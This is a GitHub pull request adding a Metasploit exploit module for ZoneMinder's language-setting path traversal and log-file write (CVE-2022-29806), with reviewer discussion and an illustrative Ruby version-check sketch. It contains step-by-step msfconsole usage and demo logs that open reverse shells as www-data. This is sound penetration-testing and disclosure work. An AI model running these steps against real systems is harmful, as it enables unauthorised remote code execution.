Add Zoneminder lang exec module #16514

Merged (23 commits), May 4, 2022

Conversation

krastanoel (Contributor)

This module exploits arbitrary file write in debug log file option chained with a path traversal in language settings that leads to a remote code execution in ZoneMinder surveillance software versions before 1.36.13 and before 1.37.11.

More vulnerability details and references: CVE-2022-29806

Meterpreter

Upon successful exploitation the module will change the language back to en_gb to prevent a PHP warning from showing in the dashboard, like this:

View: request Request: log Action: User: admin] at /usr/share/zoneminder/www/index.php line 235 04/28/22 15:03:50.516723 web_js[550].ERR [172.17.0.1] [
Warning: Use of undefined constant [snip-base64-long-string-payload] - assumed '[snip-base64-string-payload] in /tmp/8NMNy9sqV.php on line 10

The warning is a lot and will be noticed by users using the dashboard, so it's good to change it back to its default. However, using php/meterpreter_reverse_tcp will even make the dashboard stop working; it's like the part of the code that is supposed to change the language back is not executing when using meterpreter. The module will configure php/reverse_perl as the default payload for good reliability.

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • use exploit/unix/webapp/zoneminder_lang_exec
  • set RHOSTS [ips]
  • set LHOST [lhost]
  • set VERBOSE true
  • run
  • Verify that the module gets a shell.

Demo

ZoneMinder 1.36.4 on Linux (Ubuntu 18.04 Docker Image)

msf6 > use exploit/unix/webapp/zoneminder_lang_exec
[*] Using configured payload php/reverse_perl
msf6 exploit(unix/webapp/zoneminder_lang_exec) > set RHOSTS 172.17.0.2
RHOSTS => 172.17.0.2
msf6 exploit(unix/webapp/zoneminder_lang_exec) > set LHOST 172.17.0.1
LHOST => 172.17.0.1
msf6 exploit(unix/webapp/zoneminder_lang_exec) > set VERBOSE true
VERBOSE => true
msf6 exploit(unix/webapp/zoneminder_lang_exec) > run

[*] Started reverse TCP handler on 172.17.0.1:4444
[+] Version Detected: 1.36.4
[*] Leak installation directory path
[+] Path: /usr/share/zoneminder/www
[+] Shell: ../../../../../tmp/n4Ibantd.php
[*] Command shell session 1 opened (172.17.0.1:4444 -> 172.17.0.2:36390) at 2022-04-28 21:39:56 +0700

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

bcoles (Contributor) commented Apr 28, 2022

I took a quick look over the module code. A few observations.

fail_with should not be used within the check method. If the connection fails, the usual approach is to return CheckCode::Unknown or CheckCode::Safe.

This code pattern is used a few times in the check method:

        if res.body =~ %r{<title>ZM - Login</title>}
          vprint_error('Service found, but authentication failed')
          return Exploit::CheckCode::Detected
        else

Rather than print then return a checkcode, you can return both at once:

return CheckCode::Detected('Service found, but authentication failed')

Also else is redundant after return.

The exploit method returns CheckCode in a few instances. It should instead use fail_with.

rand_text_alphanumeric supports a range. Rather than use rand you can do this: rand_text_alphanumeric(6..15)

Is it possible to get the current language before resetting it, rather than presume it was en_gb ?
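The check-method conventions listed in the review above (return a CheckCode instead of calling fail_with, attach the detail string to the code rather than printing it first, and pass a Range to rand_text_alphanumeric) are shown below in a stand-alone Ruby sketch added here for illustration; it is not the module's code and it does not load the framework. Msf::Exploit::CheckCode and the HTTP response are replaced by small stand-in structs (an assumption), the body marker "ZoneMinder v1.36.4" is a constructed sample rather than what the real application serves, and the fixed versions 1.36.13 and 1.37.11 are the ones named in the PR description.

```ruby
require 'rubygems' # for Gem::Version

# Stand-in for Msf::Exploit::CheckCode (assumption: the real framework is not
# loaded here). As with the real one, a code carries an optional detail message,
# so a check can return both in one expression instead of vprint + return.
CheckCode = Struct.new(:name, :message) do
  def self.unknown(msg = nil);  new('Unknown', msg);  end
  def self.safe(msg = nil);     new('Safe', msg);     end
  def self.detected(msg = nil); new('Detected', msg); end
  def self.appears(msg = nil);  new('Appears', msg);  end

  def to_s
    message ? "#{name}: #{message}" : name
  end
end

# Minimal HTTP response stub (assumption) with the two fields the check reads.
HttpResponse = Struct.new(:code, :body)

# Fixed versions taken from the PR description.
FIXED_VERSIONS = {
  '1.36' => Gem::Version.new('1.36.13'),
  '1.37' => Gem::Version.new('1.37.11')
}.freeze

# True when the reported version falls in a range the advisory calls vulnerable.
# Releases older than the 1.36 line (e.g. 1.32.3 in the test logs on this page)
# predate both fixes, so they compare against the 1.36 fix and come out vulnerable.
def zoneminder_vulnerable?(version_str)
  v = Gem::Version.new(version_str)
  branch = v.segments[0, 2].join('.')
  fixed = FIXED_VERSIONS[branch] || FIXED_VERSIONS['1.36']
  v < fixed
rescue ArgumentError # malformed version string
  false
end

# The check itself: every exit path returns a CheckCode, never fail_with, and the
# explanatory text travels with the code. No else after a return.
def zoneminder_check(res)
  return CheckCode.unknown('Connection failed') if res.nil?
  return CheckCode.detected('Service found, but authentication failed') if res.body =~ %r{<title>ZM - Login</title>}

  # Assumption: a constructed marker of the form "ZoneMinder v1.36.4" in the body.
  version = res.body[/ZoneMinder v(\d+\.\d+\.\d+)/, 1]
  return CheckCode.unknown('ZoneMinder not found in response') unless version

  if zoneminder_vulnerable?(version)
    CheckCode.appears("Version Detected: #{version}")
  else
    CheckCode.safe("Version Detected: #{version}")
  end
end

# rand_text_alphanumeric accepting a Range, as suggested in the review: the
# length is drawn from the range first, then the characters.
ALNUM = [*'a'..'z', *'A'..'Z', *'0'..'9'].freeze

def rand_text_alphanumeric(len)
  len = rand(len) if len.is_a?(Range)
  Array.new(len) { ALNUM.sample }.join
end

if $PROGRAM_NAME == __FILE__
  [nil,
   HttpResponse.new(200, '<title>ZM - Login</title>'),
   HttpResponse.new(200, '<html>ZoneMinder v1.36.4</html>'),
   HttpResponse.new(200, '<html>ZoneMinder v1.36.13</html>')].each { |r| puts zoneminder_check(r) }
  puts rand_text_alphanumeric(6..15)
end
```

The same version comparison is what a defender would run against an inventory of ZoneMinder hosts to decide which ones still need the 1.36.13 or 1.37.11 update; the Unknown code is the honest answer when the service cannot be reached or identified, which is why the review prefers it to aborting the check.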

krastanoel (Contributor, Author)

Hello @bcoles
Thanks for the observations, I have made a few changes accordingly.

Is it possible to get the current language before resetting it, rather than presume it was en_gb ?

Yes it is possible, I just learned get_html_document method today and have used it to get the current language.

jmartin-tech (Contributor) left a comment

Thanks for the contribution!

Made a couple minor comments for review.

space-r7 self-assigned this May 2, 2022

space-r7 (Contributor) left a comment

Hey @krastanoel, thanks for the module! I just left a few small notes mostly about using the cookie jar and checking responses.

krastanoel and others added 6 commits May 3, 2022 15:43
Update documentation common default options

Co-authored-by: Shelby Pace <40177151+space-r7@users.noreply.github.com>
- use keep_cookies instead of grabbing and set manually
- separate login code to its own method
- check response is not nil before calling get_html_document method
- clear cookie jar in exploit method and authenticate if user disable AutoCheck option
Remove unnecessary check for content-type response

Co-authored-by: Shelby Pace <40177151+space-r7@users.noreply.github.com>
space-r7 (Contributor) commented May 4, 2022

Version 1.32.3 without auth
msf6 > use exploit/unix/webapp/zoneminder_lang_exec
[*] Using configured payload php/reverse_perl
msf6 exploit(unix/webapp/zoneminder_lang_exec) > set rhost 192.168.140.154
rhost => 192.168.140.154
msf6 exploit(unix/webapp/zoneminder_lang_exec) > set lhost 192.168.140.1
lhost => 192.168.140.1
msf6 exploit(unix/webapp/zoneminder_lang_exec) > run

[*] Started reverse TCP handler on 192.168.140.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version Detected: 1.32.3
[*] Command shell session 1 opened (192.168.140.1:4444 -> 192.168.140.154:47700 ) at 2022-05-04 17:20:39 -0500

uname -a
Linux ubuntu 5.13.0-40-generic #45~20.04.1-Ubuntu SMP Mon Apr 4 09:38:31 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
^C
Abort session 1? [y/N]  y


Version 1.32.3 with authentication
msf6 exploit(unix/webapp/zoneminder_lang_exec) > set username admin
username => admin
msf6 exploit(unix/webapp/zoneminder_lang_exec) > set password Strongpass
password => Strongpass
msf6 exploit(unix/webapp/zoneminder_lang_exec) > set verbose true
verbose => true
msf6 exploit(unix/webapp/zoneminder_lang_exec) > run

[*] Started reverse TCP handler on 192.168.140.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version Detected: 1.32.3
[*] Leak installation directory path
[+] Path: /usr/share/zoneminder/www
[+] Shell: ../../../../../tmp/wu4ap43AH8F.php
[!] Unable to reset language to default
[*] Command shell session 3 opened (192.168.140.1:4444 -> 192.168.140.154:47704 ) at 2022-05-04 17:25:49 -0500

uname -a
Linux ubuntu 5.13.0-40-generic #45~20.04.1-Ubuntu SMP Mon Apr 4 09:38:31 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

space-r7 added a commit that referenced this pull request May 4, 2022
space-r7 merged commit 115dad7 into rapid7:master May 4, 2022

space-r7 (Contributor) commented May 4, 2022

Made some small changes in dd0b124, just fixing a typo and adding some checks on a few responses.

space-r7 added the rn-modules label (release notes for new or majorly enhanced modules) May 4, 2022

space-r7 (Contributor) commented May 4, 2022

Release Notes

This leverages a directory traversal and arbitrary file write in vulnerable versions of ZoneMinder to achieve remote code execution as the www-data user.

krastanoel added a commit to krastanoel/msf that referenced this pull request May 5, 2022
Labels: docs, module, rn-modules